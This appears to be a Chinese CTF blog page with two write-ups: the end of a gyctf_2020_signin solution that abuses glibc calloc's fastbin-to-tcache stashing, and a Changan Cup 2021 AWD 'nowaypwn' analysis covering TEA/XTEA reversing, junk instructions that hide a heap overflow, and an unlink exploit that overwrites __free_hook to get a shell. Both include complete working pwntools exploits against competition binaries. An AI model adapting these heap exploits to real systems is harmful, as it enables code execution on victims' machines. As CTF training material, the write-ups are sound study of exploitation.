	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
	}
#endif
    }
  else
    {
      /* No usable arenas.  */
      oldtop = 0;
      oldtopsize = 0;
    }
  mem = _int_malloc (av, sz);

  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
          av == arena_for_chunk (mem2chunk (mem)));

  if (!SINGLE_THREAD_P)
    {
      if (mem == 0 && av != NULL)
	{
	  LIBC_PROBE (memory_calloc_retry, 1, sz);
	  av = arena_get_retry (av, sz);
	  mem = _int_malloc (av, sz);
	}

      if (av != NULL)
	__libc_lock_unlock (av->mutex);
    }

  /* Allocation failed even after a retry.  */
  if (mem == 0)
    return 0;

  mchunkptr p = mem2chunk (mem);

  /* If we are using memory tagging, then we need to set the tags
     regardless of MORECORE_CLEARS, so we zero the whole block while
     doing so.  */
  if (__glibc_unlikely (mtag_enabled))
    return tag_new_zero_region (mem, memsize (p));

  INTERNAL_SIZE_T csz = chunksize (p);

  /* Two optional cases in which clearing not necessary */
  if (chunk_is_mmapped (p))
    {
      if (__builtin_expect (perturb_byte, 0))
        return memset (mem, 0, sz);

      return mem;
    }

#if MORECORE_CLEARS
  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
    {
      /* clear only the bytes from non-freshly-sbrked memory */
      csz = oldtopsize;
    }
#endif

  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
     contents have an odd number of INTERNAL_SIZE_T-sized words;
     minimally 3.  */
  d = (INTERNAL_SIZE_T *) mem;
  clearsize = csz - SIZE_SZ;
  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
  assert (nclears >= 3);

  if (nclears > 9)
    return memset (d, 0, clearsize);

  else
    {
      *(d + 0) = 0;
      *(d + 1) = 0;
      *(d + 2) = 0;
      if (nclears > 4)
        {
          *(d + 3) = 0;
          *(d + 4) = 0;
          if (nclears > 6)
            {
              *(d + 5) = 0;
              *(d + 6) = 0;
              if (nclears > 8)
                {
                  *(d + 7) = 0;
                  *(d + 8) = 0;
                }
            }
        }
    }

  return mem;
}

相信各位都能发现 __libc_calloc() 和 __libc_malloc() 的差别是很小的，通常情况下将 __libc_calloc() 视为 __libc_malloc() + memset() 是合理的．但除此之外还有一点区别是 __libc_calloc() 中缺少从非空的 tcache 取出 chunk 的部分，因此 calloc() 将优先从 fastbin 中分配 chunk．

这也是本题目的利用的核心思路．

错误思路-`tcache poisoning`

Y7n05h 刚开始也是想采用 tcache poisoning 来完成本题，并寄希望与 free/malloc 的过程中能清除 cnt 实现第二次 edit．但很遗憾，此路并不通．通过此方式虽能将 chunk 分配在 ptr 上，但无法修改 ptr 的值．（至少 Y7n05h 没想到）

正确思路

此方式是从 Pwnki 师傅的博客学来的．在这里感谢 Pwnki 师傅师傅．

利用思路：

分配 8 个大小为 0x80 的 chunk 后全部 free，前 7 个塞满了 tcache，后一个进入 fastbin
在分配一个 chunk，这将从 tcache 中取出一个 chunk
修改在 1 中放入的 fastbin 中的 chunk 的 fd 的指针为 ptr - 0x10，注意这个行为使 glibc 认为 ptr - 0x10 是一个 chunk，则 ptr 则是这个 chunk 的 fd
通过执行 backdoor，调用 calloc 从 fastbin 取出 chunk 并将其 fd 指向的 ptr - 0x10 作为一个 chunk 插入 tcache 链表．插入过程中 ptr 将作为 tcache_entry 的 next 字段被修改．

这些过程的相关代码：

typedef struct tcache_entry
{
  struct tcache_entry *next;
  /* This field exists to detect double frees.  */
  uintptr_t key;
} tcache_entry;

#define REMOVE_FB(fb, victim, pp)			\
  do							\
    {							\
      victim = pp;					\
      if (victim == NULL)				\
	break;						\
      pp = REVEAL_PTR (victim->fd);                                     \
      if (__glibc_unlikely (pp != NULL && misaligned_chunk (pp)))       \
	malloc_printerr ("malloc(): unaligned fastbin chunk detected"); \
    }							\
  while ((pp = catomic_compare_and_exchange_val_acq (fb, pp, victim)) \
	 != victim);					\

     /* While we're here, if we see other chunks of the same size,
 stash them in the tcache.  */
     size_t tc_idx = csize2tidx (nb);
     if (tcache && tc_idx < mp_.tcache_bins)
{
  mchunkptr tc_victim;

  /* While bin not empty and tcache not full, copy chunks.  */
  while (tcache->counts[tc_idx] < mp_.tcache_count
	 && (tc_victim = *fb) != NULL)
    {
      if (__glibc_unlikely (misaligned_chunk (tc_victim)))
	malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");
      if (SINGLE_THREAD_P)
	*fb = REVEAL_PTR (tc_victim->fd);
      else
	{
	  REMOVE_FB (fb, pp, tc_victim);
	  if (__glibc_unlikely (tc_victim == NULL))
	    break;
	}
      tcache_put (tc_victim, tc_idx);
    }
}

完整 exp：

from pwn import *
path = '/home/admin/Downloads/gyctf_2020_signin'
elf = ELF(path)
r = process(path)


def i2b(n: int, Hex: bool = False):
    return bytes(hex(n) if Hex else str(n), encoding="ascii")


def backdoor():
    r.sendafter(b"?", b'6')


def add(idx: int):
    r.sendafter(b"?", b'1')
    r.sendafter(b"idx?\n", i2b(idx))


def delete(idx: int):
    r.sendafter(b"?", b'3')
    r.sendafter(b"idx?\n", i2b(idx))


def edit(idx: int, content: bytes):
    r.sendafter(b"?", b'2')
    r.sendafter(b"idx?\n", i2b(idx))
    r.send(content)


addr = elf.symbols['ptr']-0x10
for i in range(8):
    add(i)
for i in range(8):
    delete(i)

add(8)
payload = p64(addr)
edit(7, payload)

backdoor()
r.interactive()

参考资料

¹. Pwnki-gyctf_2020_signin. ↩

². PYozo_free-gyctf_2020_signin. ↩

2021-10-20发表CyberspaceSecurity20 分钟读完 (大约2941个字)

WriteUp-长安杯2021-决赛 AWD-nowaypwn

Y7n05h 非常激动能有机会（虽然是以替补的身份）参加长安杯 2021 决赛．这是 Y7n05h 第一次参加 CTF 线下赛，因为缺少经验，Y7n05h 犯了不少错误．在本文中，Y7n05h 将复盘比赛时的行为．
同时也感谢「摸一把」战队的大师傅，指出了 Y7n05h 的指点．
在 AWD 赛制中，Y7n05h 对没有做出这道 nowaypwn 十分的遗憾．

现在就让 Y7n05h 重新审视一下这道题目，看看它究竟考察了什么吧．

warning
免责声明

本文所述 PWN 均属 CTF（Capture The Flag）参赛行为或赛前训练行为．笔者所 PWN 的对象均为 CTF 比赛或练习中平台方提供的靶机．
本文意在分享网络安全与 CTF 相关技术与技巧，共同提升实力．
请本文读者谨记相关法律法规与政策．读者需为自身行为承担相应的法律后果．笔者（Y7n05h）不为读者的行为承担责任．

基本分析

pwn/nowaypwn
filetype: ELF64
arch: AMD64
mode: 64 bits
endianess: LE
type: EXEC
  library: GLIBC(2.4)[EXEC AMD64-64]
  compiler: gcc((Ubuntu 5.3.1-14ubuntu2) 5.3.1 20160413)[EXEC AMD64-64]
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable	FILE
Partial RELRO   Canary found      NX enabled    No PIE          No RPATH   No RUNPATH   No Symbols	 No	0		2	/home/admin/pwn/nowaypwn
	linux-vdso.so.1 (0x00007ffc85dee000)
	libc.so.6 => /usr/lib/libc.so.6 (0x00007fd505212000)
	/lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fd5053fd000)

题目提供的 libc 附件的版本是 2.23-0ubuntu11.3_amd64，SHA-1 为：eb4e85135a8dfe60c1f5bfb704b1e5cfde24a0b8（大概是这个，文件弄乱了，Y7n05h 对此不是非常确定）．

逆向工程分析

虽说这是一道 PWN 题，但在 Y7n05h 看来这道题的最重要的部分不是 PWN，而是逆向工程．本题的 PWN 部分十分简单，出题人在逆向工程部分设下了多个障碍．下面就听 Y7n05h 逐一说明．

下面是 IDA 生成的伪码．

__int64 __fastcall sub_400BFD(unsigned int *a1)
{
  __int64 result; // rax
  int i; // [rsp+1Ch] [rbp-3Ch]
  unsigned int v3; // [rsp+20h] [rbp-38h]
  unsigned int v4; // [rsp+24h] [rbp-34h]
  unsigned int v5; // [rsp+28h] [rbp-30h]
  int v6[6]; // [rsp+38h] [rbp-20h]
  unsigned __int64 v7; // [rsp+50h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  v6[0] = 674697780;
  v6[1] = 422065475;
  v6[2] = 423118625;
  v6[3] = -1741216238;
  v3 = *a1;
  v4 = a1[1];
  v5 = 0;
  for ( i = 0; i <= 31; ++i )
  {
    v3 += (((v4 >> 5) ^ (16 * v4)) + v4) ^ (v6[v5 & 3] + v5);
    v5 -= 1640531527;
    v4 += (((v3 >> 5) ^ (16 * v3)) + v3) ^ (v6[(v5 >> 11) & 3] + v5);
  }
  *a1 = v3;
  result = v4;
  a1[1] = v4;
  return result;
}
_BOOL8 __fastcall sub_400DB8(_BYTE *a1)
{
  sub_400BFD(a1);
  return *a1 == 20
      && a1[1] == 92
      && a1[2] == 0xA6
      && a1[3] == 0xD2
      && a1[4] == 14
      && a1[5] == 69
      && a1[6] == 9
      && a1[7] == 119;
}
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  __int64 result; // rax
  char v4[16]; // [rsp+18h] [rbp-50h] BYREF
  char buf[16]; // [rsp+28h] [rbp-40h] BYREF
  char v6[40]; // [rsp+38h] [rbp-30h] BYREF
  unsigned __int64 v7; // [rsp+60h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  sub_40091D(a1, a2, a3);
  puts("Happy to see you darling!");
  puts("Give me your name:");
  read(0, buf, 0x10uLL);
  puts("Give me your key:");
  read(0, v4, 0x20uLL);
  puts("Now start the game!");
  do
  {
    puts("Input your password!:");
    read(0, v6, 0x2CuLL);
    result = sub_400DB8(v6);
  }
  while ( (_DWORD)result != 1 );
  return result;
}

Y7n05h 在伪码中没有找到任何漏洞．

难道这是个栈题，漏洞存在于 sub_400BFD() 里面吗？

通过 IDA 插件 Findcrypt 得到 TEA_DELTA_400C64 的内容．通过搜索引擎得知 TEA 加密算法．

uint32_t delta = 0x9e3779b9;//常数 可更改

void tea_encrypt(uint32_t s[2], const uint32_t key[4]) {


    uint32_t l = s[0];
    uint32_t r = s[1];
    uint32_t sum = 0;
    for (int i = 0; i < 32; ++i) {
        l += (((r >> 5) ^ (r << 4)) + r) ^ (key[sum & 3] + sum);
        sum += delta;
        r += (((l >> 5) ^ (l << 4)) + l) ^ (key[(sum >> 11) & 3] + sum);
    }
    s[0] = l;
    s[1] = r;
}
void tea_decrypt(uint32_t v[2], const uint32_t key[4]) {
    uint32_t l = v[0], r = v[1];

    uint32_t sum = delta << 5;
    for (int i = 0; i < 32; i++) {
        r -= (((l << 4) ^ (l >> 5)) + l) ^ (sum + key[(sum >> 11) & 3]);
        sum -= delta;
        l -= (((r << 4) ^ (r >> 5)) + r) ^ (sum + key[sum & 3]);
    }
    v[0] = l;
    v[1] = r;
}

通过，对比 tea_encrypt() 与 sub_400BFD()，Y7n05h 认为 sub_400BFD() 就是使用 TEA 算法加密一个 64 bits 的分组的函数．

噢，或许会有读者觉得：

在 tea_encrypt() 中是：

1	sum += delta;

在 sub_400BFD() 中是：

1	v5 -= 1640531527;

这两处不但数值不同，而且一处为加法，一处为减法，怎么能说 sub_400BFD() 和 tea_encrypt() 等价呢？

有这样的顾虑的读者，请别忘了，有符号整形采用二进制补码存储，因此减去 1640531527 也就是加上 0x9e3779b9.

因此，Y7n05h 认为这两个函数完全等价（这个结论在当前是正确的），也就是说 sub_400BFD() 是 TEA 加密算法的一种实现，那么就能得知 sub_400BFD() 加密的内容可用 tea_decrypt() 解密．

先别急着去解密密文，别忘了这是 PWN 题，不是逆向题，那么漏洞在哪里呢？Y7n05h 并没有找到．

在紧张的 AWD 比赛中，Y7n05h 对此题没有更多的进展了．在 Y7n05h 发现自己做不出此题后，Y7n05h 决定先开始防御．Y7n05h 写出了下面的代码：

#include <stdio.h>
#include <unistd.h>
int main(void) {
    setvbuf(stderr, NULL, _IONBF, 0);
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    char buf[0x50];
    puts("Happy to see you darling!");
    puts("Give me your name:");
    read(0, buf, 0x10uLL);
    puts("Give me your key:");
    read(0, buf, 0x20uLL);
    puts("Now start the game!");
    do {
        puts("Input your password!:");
        read(0, buf, 0x2CuLL);
    } while (1);
}

为了防止别的队伍 PWN 掉 Y7n05h 的靶机，Y7n05h 编译了上面的代码，替换了靶机中的程序．Y7n05h 看了看比赛平台上并未将靶机判为宕机状态，于是 Y7n05h 知道这样的改动通过了 check.（「摸一把」战队的大师傅在赛后告诉 Y7n05h 这是比赛方设置的 check 过于宽松，在多数的比赛中 check 将检查原程序与靶机上运行的程序的大小差异，差异过大不能通过 check）Y7n05h 这样的改动通过了 checks 纯属侥幸，请各位读者不要学习．

那么使用密钥（v6 的前 128 bits，也就是下面的 key）:

uint32_t key[4] =
        {0x28371234,
         0x19283543,
         0x19384721,
         0x98372612};

解密密文分组：

1	uint8_t message[9] = {0x14, 0x5c, 0xa6, 0xd2, 0x0e, 0x45, 0x09, 0x77};

通过 pwntools 将得到的明文分组，在程序中输入，得到密码输入错误的提示．

Y7n05h 尝试提取 sub_400BFD() 的伪码修改并编译，输入上面获得的明文分组和密钥，成功的得到了密文分组．
Y7n05h 又去尝试使用 gdb 追踪 sub_400BFD() 的解密过程，发现 sub_400BFD() 结束后，得到了不同于预期的密文分组．

这真是一件令 Y7n05h 感到费解的事！使用 tea_decrypt() 解密密文得到的明文，输入至 tea_encrypt() 或 IDA 中复制出的 sub_400BFD() 能得到相同的密文分组，但若输入至 nowaypwn 程序中，则能得到异于前面的 tea_encrypt() 的输出的密文分组．

这真是奇怪！Y7n05h 开始思考是不是 sub_400BFD() 中是不是存在 C 语言中的 Undefined Behavior 导致了不同的执行结果．

就在 Y7n05h 试图对比通过编译 sub_400BFD() 伪码得到的汇编代码与反汇编 nowaypwn 得到的汇编代码时，发现：

.text:0000000000400CF2                 call    $+5
.text:0000000000400CF7                 add     [rsp+58h+var_58], 6
.text:0000000000400CFC                 retn
.text:0000000000400CFC sub_400BFD      endp ; sp-analysis failed

IDA 的报错是因为这里存在花指令，Y7n05h 在这里贴出的部分全都是用于干扰反汇编、反编译工具的花指令，有兴趣知道这些指令为什么能干扰反汇编、反编译工具的读者可以通过 GDB 追踪这三个指令的执行．

通过 IDA 的 patch 功能将这些花指令改为 nop，然后使用 IDA 重新分析程序即可得到完整的 sub_400BFD() 伪码：

unsigned __int64 __fastcall sub_400BFD(unsigned int *a1)
{
  int i; // [rsp+14h] [rbp-3Ch]
  int j; // [rsp+14h] [rbp-3Ch]
  unsigned int v4; // [rsp+18h] [rbp-38h]
  unsigned int v5; // [rsp+18h] [rbp-38h]
  unsigned int v6; // [rsp+1Ch] [rbp-34h]
  unsigned int v7; // [rsp+1Ch] [rbp-34h]
  unsigned int v8; // [rsp+20h] [rbp-30h]
  unsigned int v9; // [rsp+20h] [rbp-30h]
  unsigned int v10; // [rsp+24h] [rbp-2Ch]
  unsigned int v11; // [rsp+28h] [rbp-28h]
  int v12[6]; // [rsp+30h] [rbp-20h]
  unsigned __int64 v13; // [rsp+48h] [rbp-8h]

  v13 = __readfsqword(0x28u);
  v10 = *a1;
  v11 = a1[1];
  v12[0] = 674697780;
  v12[1] = 422065475;
  v12[2] = 423118625;
  v12[3] = -1741216238;
  v4 = *a1;
  v6 = a1[1];
  v8 = 0;
  for ( i = 0; i <= 31; ++i )
  {
    v4 += (((v6 >> 5) ^ (16 * v6)) + v6) ^ (v12[v8 & 3] + v8);
    v8 -= 1640531527;
    v6 += (((v4 >> 5) ^ (16 * v4)) + v4) ^ (v12[(v8 >> 11) & 3] + v8);
  }
  *a1 = v4;
  a1[1] = v6;
  v5 = v10;
  v7 = v11;
  v9 = 0;
  for ( j = 0; j <= 8; ++j )
  {
    v5 += (((v7 >> 5) ^ (16 * v7)) + v7) ^ (v12[v9 & 3] + v9);
    v9 += 0x19286521;
    v7 += (((v5 >> 5) ^ (16 * v5)) + v5) ^ (v12[(v9 >> 11) & 3] + v9);
  }
  *a1 = v5;
  a1[1] = v7;
  return __readfsqword(0x28u) ^ v13;
}

通过分析这段伪码就能发现，TEA 算法生成的密文分组并未被使用，程序中真正使用的是另一个加密算法．最终，可知这是 XTEA 算法．
这是 Y7n05h 通过搜索找到的 XTEA 算法实现．

#include <stdint.h>
#define delta 0x9E3779B9U//常量 可更改
void encrypt(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4]) {
    uint32_t v0 = v[0], v1 = v[1], sum = 0;
    for (int i = 0; i < num_rounds; i++) {
        v0 += (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
        sum += delta;
        v1 += (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
    }
    v[0] = v0;
    v[1] = v1;
}

void decrypt(unsigned int num_rounds, uint32_t v[2], uint32_t const key[4]) {
    uint32_t v0 = v[0], v1 = v[1], sum = delta * num_rounds;
    for (int i = 0; i < num_rounds; i++) {
        v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
        sum -= delta;
        v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
    }
    v[0] = v0;
    v[1] = v1;
}

通过对比能确认这里使用的算法就是修改了 delta 常量的 XTEA 算法．

其实不但这里（0x400CF2）有花指令，在 0x400EEE、0x400B44 也有花指令，patch 掉这些花指令之后，使用 IDA 重新生成伪码，就能清晰的看到漏洞所在：

ssize_t Edit()
{
  ssize_t result; // rax
  unsigned __int64 Idx; // [rsp+8h] [rbp-8h]

  Idx = get_Idx();
  if ( Idx > 0x10 || !Arr[2 * Idx] || !Size[2 * Idx] )
    exit(0);
  read(0, Arr[2 * Idx], Size[2 * Idx]);
  result = Size[2 * Idx];
  if ( result == 0x66 )
    return read(0, Arr[2 * Idx], 0x80uLL);
  return result;
}

这里的溢出过于刻意，相信所有人在 patch 掉这些花指令之后都能十分容易的发现这里的漏洞．

漏洞利用

在得到完整的伪码后，就能知道，本题目使用的加密算法是修改了常数的 XTEA 算法．修改 XTEA 的解密算法的常数后，解密得到：skdmaje1．

根据伪码写出：

from pwn import *
context(log_level='debug', os='linux', arch='amd64')

path = '/home/admin/pwn/nowaypwn'
libcpath = '/home/admin/pwn/libc.so.6'

libc = ELF(libcpath)
elf = ELF(path)
r = process(path)

passwd = b'skdmaje1'

r.sendafter(":\n", b'123')  # name
r.sendafter(":\n", b'123')  # key
r.sendafter(":\n", passwd)  # passwd


def up6(addr_port: bytes):
    log.debug("get bytes"+addr_port.hex())
    recvlen = len(addr_port)
    log.debug("recv len "+hex(recvlen))
    assert(recvlen == 6)

    return u64(addr_port.ljust(8, b"\x00"))


def i2b(n: int, Hex: bool = False):
    return bytes(hex(n) if Hex else str(n), encoding="ascii")


def Alloc(size: int):
    r.sendline(b'1')
    r.sendline(i2b(size))


def Delete(idx: int):
    r.sendline(b'2')
    r.sendline(i2b(idx))


def Edit(idx: int, content: bytes):
    r.sendline(b'3')
    r.sendline(i2b(idx))
    r.send(content)


def Show(idx: int):
    r.sendline(b'4')
    r.sendline(i2b(idx))


def Get_pr(idx: int):
    return 0x6020C0+idx*0x10

由于本题并未开启 PIE，Y7n05h 选择使用 Unlink 去完成本题目．

Alloc(0x30)  # 0
Alloc(0x30)  # 1
Alloc(0x66)  # 2
Alloc(0x100)  # 3
Alloc(0x10)  # 4

Edit(0, b'/bin/sh\x00')

Edit(2, cyclic(0x66))
chunk2_pr = Get_pr(2)
payload = flat(0, 0x21, chunk2_pr-0x18, chunk2_pr -
               0x10, 0x20).ljust(0x60)+flat(0x60, 0x110)
r.send(payload)  # size 为 0x66 触发再次读取，产生溢出

# Unlink
Delete(3)

payload = flat(8, elf.got['puts'], 0x8, Get_pr(1), 8)
Edit(2, payload)
r.send(p64(elf.got['puts']))  # size 为 0x66 触发再次读取

Show(1)
puts_addr = up6(r.recv(6))
libc_base = puts_addr-libc.symbols['puts']
free_hook_addr = libc.symbols['__free_hook']+libc_base
system_addr = libc.symbols['system']+libc_base
payload = p64(free_hook_addr)
Edit(2, payload)
Edit(1, p64(system_addr))
Delete(0)
r.interactive()

因为本题的 PWN 部分十分简单，Y7n05h 就不解释 exp 的每行的作用了．

最后，再次感谢「摸一把」战队的大师傅，Y7n05h 在比赛中没找到漏洞点，有花指令隐藏了漏洞点是 Y7n05h 赛后从「摸一把」战队的大师傅那里得知的．

前言

IPv6 地址分类

单播地址

组播地址

IPv6 地址自动配置的过程

地址自动配置方法分类

本地链路地址配置 Link Local Address

全球单播地址 Global Unicast Address / 唯一本地地址 Unique Local Address 自动配置

地址自动配置方法分类解释

Stateless 地址自动配置（Stateless Address Auto-configuration,SLAAC）

Stateful 地址自动配置（Stateful Address Auto-configuration）

路由器通告（Router Advertisement,RA）

邻居通告（Neighbor Advertisement,NA）

参考资料

Preface

Test environment information

Performance Tests

Test 1

Test 2

Summary

前言

压测环境

压力测试

测试1

测试2

总结

起因

性能分析

异常的实现

是否该使用异常？

异常的原理

参考资料

初识

参与

参考资料

历史的接口

同步接口

异步接口

阻塞与非阻塞

io_uring 一统天下

MoreInfo

参考资料

子卷管理

快照

自动快照

snapper

btrfs-autosnapshot

参考资料

list.h 源码分析

参考资料

WriteUp-gyctf_2020_signin

错误思路-tcache poisoning

正确思路

参考资料

基本分析

逆向工程分析

漏洞利用

链接

分类

最新文章

归档

标签

错误思路-`tcache poisoning`